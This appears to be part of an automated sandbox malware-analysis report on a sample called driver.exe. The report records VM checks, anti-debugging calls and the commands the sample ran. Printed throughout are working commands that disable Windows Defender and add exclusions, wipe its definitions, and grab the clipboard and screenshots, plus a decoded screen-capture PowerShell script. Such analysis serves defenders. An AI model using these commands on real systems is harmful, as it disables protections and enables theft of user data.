              Source: getmac.exe, 0000003B.00000003.2185038981.0000025388E08000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.2187892505.0000025388E08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWA
              Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicerc
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: rar.exe, 0000004D.00000003.2348866044.0000014AD2546000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0=
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29BD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6A29BD19C
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8030330 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FF8A8030330
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29D34F0 GetProcessHeap,0_2_00007FF6A29D34F0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29BD37C SetUnhandledExceptionFilter,0_2_00007FF6A29BD37C
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29BD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6A29BD19C
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29BC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6A29BC910
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29CA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6A29CA684
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29BD37C SetUnhandledExceptionFilter,2_2_00007FF6A29BD37C
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29BD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF6A29BD19C
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29BC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF6A29BC910
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29CA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF6A29CA684
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A7F83248 IsProcessorFeaturePresent,00007FF8B9F71A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FF8B9F71A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8A7F83248
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A80BDFFC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8A80BDFFC
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A804212B IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8A804212B
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8041CB7 SetUnhandledExceptionFilter,2_2_00007FF8A8041CB7
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75429B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,77_2_00007FF75429B52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75429A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,77_2_00007FF75429A66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75429B6D8 SetUnhandledExceptionFilter,77_2_00007FF75429B6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542A4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,77_2_00007FF7542A4C10

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'"
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Users\user\Desktop\driver.exe "C:\Users\user\Desktop\driver.exe"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\driver.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
